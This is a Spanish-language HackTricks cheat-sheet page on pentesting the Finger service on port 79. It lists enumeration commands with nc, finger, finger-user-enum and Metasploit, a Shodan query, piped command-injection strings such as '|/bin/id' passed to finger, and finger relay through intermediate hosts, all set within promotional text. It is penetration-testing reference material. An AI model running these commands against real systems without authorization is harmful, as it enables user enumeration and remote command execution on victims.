4 KiB
79 - Pentesting Finger
Aprende hacking en AWS de cero a héroe con htARTE (Experto en Red Team de AWS de HackTricks)!
Otras formas de apoyar a HackTricks:
- Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los PLANES DE SUSCRIPCIÓN!
- Obtén el swag oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección exclusiva de NFTs
- Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.
Información Básica
El programa/servicio Finger se utiliza para obtener detalles sobre los usuarios de computadoras. Normalmente, la información proporcionada incluye el nombre de usuario, nombre completo y, en algunos casos, detalles adicionales. Estos detalles adicionales podrían abarcar la ubicación de la oficina y el número de teléfono (si está disponible), la hora en que el usuario inició sesión, el período de inactividad (tiempo de inactividad), la última vez que el usuario leyó el correo electrónico, y el contenido de los archivos de plan y proyecto del usuario.
Puerto predeterminado: 79
PORT STATE SERVICE
79/tcp open finger
Enumeración
Obtención de banners/Conexión básica
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Enumeración de usuarios
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Alternativamente, puedes usar finger-user-enum de pentestmonkey, algunos ejemplos:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap ejecuta un script para hacer uso de los scripts predeterminados
Metasploit utiliza más trucos que Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Ejecución de comandos
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Rebote de Finger
Utilizar un sistema como relevo de finger
finger user@host@victim
finger @internal@external
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los PLANES DE SUSCRIPCIÓN!
- Obtén el oficial PEASS & HackTricks swag
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.